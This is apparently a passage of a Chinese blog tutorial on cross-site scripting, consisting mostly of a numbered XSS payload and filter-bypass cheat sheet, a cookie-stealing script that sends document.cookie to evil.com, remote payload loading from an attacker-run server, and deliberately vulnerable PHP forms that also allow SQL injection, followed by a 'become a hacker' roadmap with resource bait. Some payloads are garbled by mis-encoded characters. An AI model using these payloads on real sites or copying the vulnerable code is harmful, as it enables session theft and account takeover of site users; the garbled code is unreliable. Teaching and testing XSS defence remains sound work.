"><span>x</span><"
'><span>x</span><'
单行注释:
"><span>x</span>//#双斜杠表示注释掉后面的语句
0x04、XSS攻击语句
输入检测确定标签没有过滤,为了显示漏洞存在,需要插入XSS攻击代码;
<script>alert(1)</script>
<svg onload=alert(1)>
<a href=javascript:alert(1)>
<a href='javascript:alert(1)'>aa</a>
复制代码
(1)普通的 XSS JavaScript 注入 <SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT> (2)IMG 标签 XSS 使用 JavaScript 命令 <IMG SRC=http://3w.org/XSS/xss.js/> (3)IMG 标签无分号无引号 <IMG SRC=javascript:alert('XSS')> (4)IMG 标签大小写不敏感 <IMG SRC=JaVaScRiPt:alert('XSS')> (5)HTML 编码(必须有分号) <IMG SRC=javascript:alert("XSS")> (6)修正缺陷 IMG 标签 <IMG """><SCRIPT>alert("XSS")</SCRIPT>"> (7)formCharCode 标签(计算器) <IMG SRC=javascript:alert(String.fromCharCode(88,83,83))> (8)UTF-8 的 Unicode 编码(计算器) <IMG SRC=jav..省略..S')> (9)7 位的 UTF-8 的 Unicode 编码是没有分号的(计算器) <IMG SRC=jav..省略..S')> (10)十六进制编码也是没有分号(计算器) <IMG SRC=java..省略..XSS')> (11)嵌入式标签,将 Javascript 分开 <IMG SRC="jav ascript:alert('XSS');"> (12)嵌入式编码标签,将 Javascript 分开 <IMG SRC="jav ascript:alert('XSS');"> (13)嵌入式换行符 <IMG SRC="jav ascript:alert('XSS');"> (14)嵌入式回车 <IMG SRC="jav ascript:alert('XSS');"> (15)嵌入式多行注入 JavaScript,这是 XSS 极端的例子 <IMG SRC="javascript:alert('XSS')"> (16)解决限制字符(要求同页面)
<script>z='document.'</script>
<script>z=z+'write("'</script>
<script>z=z+'<script'</script>
<script>z=z+'src=ht'</script>
<script>z=z+'tp://ww'</script>
<script>z=z+'w.shell'</script>
<script>z=z+'.net/1.'</script>
<script>z=z+'js></sc'</script>
<script>z=z+'ript>")'</script>
<script>eval_r(z)</script>
复制代码
(17)空字符 12-7-1 T00LS - Powered by Discuz! Board https://www.a.com/viewthread.php?action=printable&tid=15267 2/6perl-e 'print "<IMG SRC=java\0script:alert("XSS")>";' > out (18)空字符 2,空字符在国内基本没效果.因为没有地方可以利用 perl -e 'print "<SCR\0IPT>alert("XSS")</SCR\0IPT>";' > out (19)Spaces 和 meta 前的 IMG 标签 <IMG SRC=" javascript:alert('XSS');"> (20)Non-alpha-non-digit XSS <SCRIPT/XSS SRC="http://3w.org/XSS/xss.js"></SCRIPT> (21)Non-alpha-non-digit XSS to 2
<BODY onload!#$%&()*~+-_.,:;?@[/|]^`=alert("XSS")>
复制代码
(22)Non-alpha-non-digit XSS to 3 <SCRIPT/SRC="http://3w.org/XSS/xss.js"></SCRIPT> (23)双开括号 <<SCRIPT>alert("XSS");//<</SCRIPT> (24)无结束脚本标记(仅火狐等浏览器) <SCRIPT SRChttp://3w.org/XSS/xss.js?<B> (25)无结束脚本标记 2 <SCRIPT SRC=//3w.org/XSS/xss.js> (26)半开的 HTML/JavaScript XSS <IMG SRC="javascript:alert('XSS')" (27)双开角括号 <iframe src=http://3w.org/XSS.html < (28)无单引号 双引号 分号 <SCRIPT>a=/XSS/alert(a.source)</SCRIPT> (29)换码过滤的 JavaScript ";alert('XSS');// (30)结束 Title 标签 </TITLE><SCRIPT>alert("XSS");</SCRIPT> (31)Input Image <INPUT SRC="javascript:alert('XSS');"> (32)BODY Image <BODY BACKGROUND="javascript:alert('XSS')"> (33)BODY 标签 <BODY('XSS')> (34)IMG Dynsrc <IMG DYNSRC="javascript:alert('XSS')"> (35)IMG Lowsrc <IMG LOWSRC="javascript:alert('XSS')"> (36)BGSOUND <BGSOUND SRC="javascript:alert('XSS');"> (37)STYLE sheet <LINK REL="stylesheet" HREF="javascript:alert('XSS');"> (38)远程样式表 <LINK REL="stylesheet" HREF="http://3w.org/xss.css"> (39)List-style-image(列表式) <STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE<UL><LI>XSS (40)IMG VBscript <IMG SRC='vbscript:msgbox("XSS")'></STYLE><UL><LI>XSS (41)META 链接 url <META HTTP-EQUIV="refresh" CONTENT="0;URL=http://URL=javascript:alert('XSS');"> (42)Iframe <IFRAME SRC="javascript:alert('XSS');"></IFRAME> (43)Frame
<FRAMESET><FRAME SRC="javascript:alert('XSS');">
</FRAMESET>12-7-1 T00LS - Powered by Discuz!
Boardhttps://www.a.com/viewthread.php?action=printable&tid=15267 3/6
复制代码
(44)Table <TABLE BACKGROUND="javascript:alert('XSS')"> (45)TD <TABLE><TD BACKGROUND="javascript:alert('XSS')"> (46)DIV background-image <DIV STYLE="background-image: url(javascript:alert('XSS'))"> (47)DIV background-image 后加上额外字符 (1-32&34&39&160&8192-8&13&12288&65279) **<DIV STYLE="background-image: url(javascript:alert('XSS'))">** (48)DIV expression <DIV STYLE="width: expression_r(alert('XSS'));"> (49)STYLE 属性分拆表达 <IMG STYLE="xss:expression_r(alert('XSS'))"> (50)匿名 STYLE(组成:开角号和一个字母开头) <XSS STYLE="xss:expression_r(alert('XSS'))"> (51)STYLE background-image <STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><ACLASS=XSS></A> (52)IMG STYLE 方式 exppression(alert("XSS"))'> (53)STYLE background
<STYLE><STYLEtype="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>
(54)BASE
<BASE HREF="javascript:alert('XSS');//">
复制代码
(55)EMBED 标签,你可以嵌入 FLASH,其中包涵 XSS <EMBED SRC="http://3w.org/XSS/xss.swf" ></EMBED> (56)在 flash 中使用 ActionScrpt 可以混进你 XSS 的代码 a="get";b="URL("";c="javascript:";d="alert('XSS');")";eval_r(a+b+c+d); (57)XML namespace.HTC 文件必须和你的 XSS 载体在一台服务器上 <HTML xmlns:xss><?import namespace="xss" implementation="http://3w.org/XSS/xss.htc"><xss:xss>XSS</xss:xss></HTML> (58)如果过滤了你的 JS 你可以在图片里添加 JS 代码来利用 <SCRIPT SRC=""></SCRIPT> (59)IMG 嵌入式命令,可执行任意命令 <IMG SRC="http://www.a.com/a.php?a=b"> (60)IMG 嵌入式命令(a.jpg 在同服务器) Redirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser (61)绕符号过滤· <SCRIPT a=">" SRC="http://3w.org/xss.js"></SCRIPT> (62) <SCRIPT =">" SRC="http://3w.org/xss.js"></SCRIPT> (63) <SCRIPT a=">" " SRC="http://3w.org/xss.js"></SCRIPT> (64) <SCRIPT "a='>'" SRC="http://3w.org/xss.js"></SCRIPT> (65) <SCRIPT a=> SRC="http://3w.org/xss.js"></SCRIPT> (66)
12-7-1 T00LS - Powered by Discuz! Board
https://www.a.com/viewthread.php?action=printable&tid=15267 4/6<SCRIPT a=">'>"
SRC="http://3w.org/xss.js"></SCRIPT>
复制代码
(67)
<SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://3w.org/xss.js"></SCRIPT>
复制代码
(68)URL 绕行 <A HREF="http://127.0.0.1/">XSS</A> (69)URL 编码 <A HREF="http://3w.org">XSS</A> (70)IP 十进制 <A HREF="http://3232235521″>XSS</A> (71)IP 十六进制 <A HREF="http://0xc0.0xa8.0×00.0×01″>XSS</A> (72)IP 八进制 <A HREF="http://0300.0250.0000.0001″>XSS</A> (73)混合编码 <A HREF="http://6 6.000146.0×7.147/"">XSS</A> (74)节省[http:] <A HREF="//www.google.com/">XSS</A> (75)节省[www] <A HREF="http://google.com/">XSS</A> (76)绝对点绝对 DNS <A HREF="http://www.google.com./">XSS</A> (77)javascript 链接 <A HREF="javascript:document.location='http://www.google.com/'">XSS</A>
各个标签的的攻击语句;
<script>alert("hack")</script> #弹出hack
<script>alert(/hack/)</script> #弹出hack
<script>alert(1)</script> #弹出1,对于数字可以不用引号
<script>alert(document.cookie)</script> #弹出cookie
<script src=http://xxx.com/xss.js></script> #引用外部的xss
复制代码
svg标签:
<svg onload="alert(1)">
<svg onload="alert(1)"//
复制代码
标签:
<img src=1 οnerrοr=alert("hack")>
<img src=1 οnerrοr=alert(document.cookie)> #弹出cookie
复制代码
标签:
<body οnlοad=alert(1)>
<body οnpageshοw=alert(1)>
复制代码
video 标签:
<video οnlοadstart=alert(1) src="/media/hack-the-planet.mp4" />
复制代码
style标签:
<style οnlοad=alert(1)></style>
复制代码
05、XSS漏洞的挖掘
5.1、黑盒测试
尽可能找到一切用户可控并且能够输出在页面代码中的地方,比如下面这些:
- URL的每一个参数
- URL本身
- 表单
- 搜索框
5.2、常见业务场景
- 重灾区:评论区,留言区,个人信息,订单信息等
- 针对型:站内信,网页及时通讯,私信,意见反馈
- 存在风险:搜索框,当前目录,图片属性等;
5.3、白盒审计
关于XSS的代码审计主要就是从接收参数的地方和一些关键此入手;
PHP中常见的接收参数的方法有GET,_GET,GET,_POST,$_REQUEST等等,可以搜索所有接收参数的方法,然后对接收到的数据进行跟踪,看看有没有输出到页面中,然后看看输出到页面中的数据是否进行了过滤和html编码等处理
也可以搜索类似echo这样的输出语句,跟踪输出的变量是从哪里来的,我们是否能控制,如果从数据库中取得,是否能控制存到数据库得数据,存到数据库之前有没有得到过滤等等;
大多数程序会对接收参数封装在公共文件得函数中统一调用,我们就需要审计这些公共函数看有没有过滤,能否绕过等等;
同理审计DOM型注入可以搜索一些js操作DOM元素得关键字进行审计;
06、XSS的攻击过程
6.1、反射型XSS漏洞:
1、Alice经常浏览某个网站,此网站为Bob所拥有,Bob的站点需要Alice使用用户名、密码进行登陆,并存储了Ailce敏感信息(比如银行账户);
2、Tom发现Bob的站点存在反射的XSS漏洞;
3、Tom利用Bob网站的反射型XSS漏洞编写了一个exp,做成链接的形式,并利用各种手段诱导Alice点击
4、Alice在登陆Bob的站点后,浏览了Tom提供的恶意链接;
5、嵌入到恶意链接中的恶意脚本在Alice的浏览器中执行,此脚本盗取敏感信息(cookie,账号等信息),然后在Alice完全不知情的情况下将这些信息发送给了Tom;
6、Tom利用获取到的Cookie就可以以Alice的身份信息登陆Bob的站点,如果脚本的功能更强大的化,Tom还可以对Alice的浏览器做控制并进一步利用漏洞控制;
6.2、存储型XSS漏洞:
1、Bob拥有一个Web站点,该站点允许用户发布信息,浏览已发布的信息;
2、Tom检测到Bob的站点存在存储型的XSS漏洞;
3、Tom在Bob的网站发布了一个带有恶意脚本的热点信息,该热点信息存储在了Bob的服务器的数据库中,然后吸引其他用户来阅读该热点信息;
4、Bob或者时任何的其他人,如Alice浏览了该信息之后,Tom的恶意脚本就会执行;
5、Tom的恶意脚本执行后,Tom就可以对浏览器该页面的用户发起一次XSS攻击;
07、XSS攻击测试
7.1、远程加载攻击payload
XSS漏洞能够通过构造恶意的XSS语句实现很多功能,其中做常用的时,构建XSS恶意代码获取对方浏览器的COOKIE;
1)我们首先把恶意代码保存在本地kali里面,实战情况下,我们将代码保存在我们的服务器上;
var img=document.createElement("img");
img.src="http://www.evil.com/log?"+escape(document.cookie);
document.body.appendChild(img);
复制代码
2)我们在kali,用python开启http服务;
python -m http.server 80
3)我们在有XSS漏洞的地方,远程加载我们的恶意代码: <script src="http://192.168.61.128/xss.js"></script> 
看到浏览器加载了,我们的xss恶意代码;
4)成功获取到了cookie信息 
5)图片创建链接
<img src=''
onerror=document.body.appendChild(document.createElement('script')).src='//192.168.0.110/xss.
js'>
复制代码
6)字符拼接
这种一般是输入的字符有限制的时候使用
<script>z='document.'</script>
<script>z=z+'write("'</script>
<script>z=z+'<script'</script>
<script>z=z+' src=ht'</script>
<script>z=z+'tp://www.'</script>
<script>z=z+'xsstools'</script>
<script>z=z+'.com/a'</script>
<script>z=z+'mER></sc'</script>
<script>z=z+'ript>")'</script>
<script>eval(z)</script>
有的情况要用/**/注释不需要的代码。
复制代码
7)jQuery加载
<script>$.getScript("//www.xsstools.com/amER");</script>
复制代码
7.2、反射型XSS:
//前端 1.html:
<html>
<head lang="en">
<meta charset="UTF-8">
<title>反射型XSS</title>
</head>
<body>
<form action="action.php" method="post">
<input type="text" name="name" />
<input type="submit" value="提交">
</form>
</body>
</html>
//后端 action.php:
<?php
$name=$_POST["name"];
echo $name;
?>
复制代码
我们接着在输入框输入:<script>alert(/xss/)</script> 
页面直接弹出了xss的页面,可以看到, 我们插入的语句已经被页面给执行了,这就是最基本的反射型XSS漏洞,这种漏洞流向:前端–>后端–>前端
7.3、存储型XSS:
//前端:2.html
<html>
<head lang="en">
<meta charset="UTF-8">
<title>存储型XSS</title>
</head>
<body>
<form action="action2.php" method="post">
输入你的ID:<input type="text" name="id" /> <br/>
输入你的Name:<input type="text" name="name" /> <br/>
<input type="submit" value="提交">
</form>
</body>
</html>
//后端:action2.php
<?php
$id=$_POST["id"];
$name=$_POST["name"];
mysql_connect("localhost","root","root");
mysql_select_db("test");
$sql="insert into xss value ($id,'$name')";
$result=mysql_query($sql);
?>
//供其他用户访问页面:show2.php
<?php
mysql_connect("localhost","root","root");
mysql_select_db("test");
$sql="select * from xss where id=1";
$result=mysql_query($sql);
while($row=mysql_fetch_array($result)){
echo $row['name'];
}
?>
复制代码
这里有一个用户提交页面,数据提交给后端之后,后端存储在数据库中,然后当其他用户访问另一个页面的时候,后端调出该数据,显示给另一个用户,XSS代码就被执行了;
我们输入3和<script>alert(/xss/)</script>,接着,我们看看数据库;
可以看到,我们的XSS语句已经插入到数据库中了;
然后当其他用户访问,show2.php页面的时候,我们插入的XSS代码就执行了;
存储型XSS的数据流向是:前端–>后端–>数据库–>后端–>前端 
7.4、DOM型XSS
先放源代码:
// 前端3.html
<html>
<head lang="en">
<meta charset="UTF-8">
<title>DOM型XSS</title>
</head>
<body>
<form action="action3.php" method="post">
<input type="text" name="name" />
<input type="submit" value="提交">
</form>
</body>
</html>
// 后端action3.php
<?php
$name=$_POST["name"];
?>
<input id="text" type="text" value="<?php echo $name; ?>"/>
<div id="print"></div>
<script type="text/javascript">
var text=document.getElementById("text");
var print=document.getElementById("print");
print.innerHTML=text.value; // 获取 text的值,并且输出在print内。这里是导致xss的主要原因。
</script>
复制代码
这里有一个提交页面,用户可以在此提交数据,数据提交之后,给后台处理;
我们可以输入<img src=1 οnerrοr=alert(‘hack’)>,然后看看页面的变化;
页面直接弹出了hack的页面,我们插入的语句已经被页面给执行了;
这就是DOM型XSS的漏洞,这种漏洞的数据流向是:前端–>浏览器
如何自学黑客&网络安全
黑客零基础入门学习路线&规划
初级黑客
1、网络安全理论知识(2天)
①了解行业相关背景,前景,确定发展方向。
②学习网络安全相关法律法规。
③网络安全运营的概念。
④等保简介、等保规定、流程和规范。(非常重要)
2、渗透测试基础(一周)
①渗透测试的流程、分类、标准
②信息收集技术:主动/被动信息搜集、Nmap工具、Google Hacking
③漏洞扫描、漏洞利用、原理,利用方法、工具(MSF)、绕过IDS和反病毒侦察
④主机攻防演练:MS17-010、MS08-067、MS10-046、MS12-20等
3、操作系统基础(一周)
①Windows系统常见功能和命令
②Kali Linux系统常见功能和命令
③操作系统安全(系统入侵排查/系统加固基础)
4、计算机网络基础(一周)
①计算机网络基础、协议和架构
②网络通信原理、OSI模型、数据转发流程
③常见协议解析(HTTP、TCP/IP、ARP等)
④网络攻击技术与网络安全防御技术
⑤Web漏洞原理与防御:主动/被动攻击、DDOS攻击、CVE漏洞复现
5、数据库基础操作(2天)
①数据库基础
②SQL语言基础
③数据库安全加固
6、Web渗透(1周)
①HTML、CSS和JavaScript简介
②OWASP Top10
③Web漏洞扫描工具
④Web渗透工具:Nmap、BurpSuite、SQLMap、其他(菜刀、漏扫等)
恭喜你,如果学到这里,你基本可以从事一份网络安全相关的工作,比如渗透测试、Web 渗透、安全服务、安全分析等岗位;如果等保模块学的好,还可以从事等保工程师。薪资区间6k-15k
到此为止,大概1个月的时间。你已经成为了一名“脚本小子”。那么你还想往下探索吗?
如果你想要入坑黑客&网络安全,笔者给大家准备了一份:282G全网最全的网络安全资料包评论区留言即可领取!
7、脚本编程(初级/中级/高级)
在网络安全领域。是否具备编程能力是“脚本小子”和真正黑客的本质区别。在实际的渗透测试过程中,面对复杂多变的网络环境,当常用工具不能满足实际需求的时候,往往需要对现有工具进行扩展,或者编写符合我们要求的工具、自动化脚本,这个时候就需要具备一定的编程能力。在分秒必争的CTF竞赛中,想要高效地使用自制的脚本工具来实现各种目的,更是需要拥有编程能力.
如果你零基础入门,笔者建议选择脚本语言Python/PHP/Go/Java中的一种,对常用库进行编程学习;搭建开发环境和选择IDE,PHP环境推荐Wamp和XAMPP, IDE强烈推荐Sublime;·Python编程学习,学习内容包含:语法、正则、文件、 网络、多线程等常用库,推荐《Python核心编程》,不要看完;·用Python编写漏洞的exp,然后写一个简单的网络爬虫;·PHP基本语法学习并书写一个简单的博客系统;熟悉MVC架构,并试着学习一个PHP框架或者Python框架 (可选);·了解Bootstrap的布局或者CSS。
8、超级黑客
这部分内容对零基础的同学来说还比较遥远,就不展开细说了,附上学习路线。
网络安全工程师企业级学习路线
如图片过大被平台压缩导致看不清的话,评论区点赞和评论区留言获取吧。我都会回复的
视频配套资料&国内外网安书籍、文档&工具
当然除了有配套的视频,同时也为大家整理了各种文档和书籍资料&工具,并且已经帮大家分好类了。
一些笔者自己买的、其他平台白嫖不到的视频教程。
网上学习资料一大堆,但如果学到的知识不成体系,遇到问题时只是浅尝辄止,不再深入研究,那么很难做到真正的技术提升。
一个人可以走的很快,但一群人才能走的更远!不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人,都欢迎加入我们的的圈子(技术交流、学习资源、职场吐槽、大厂内推、面试辅导),让我们一起学习成长!
扫一扫
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
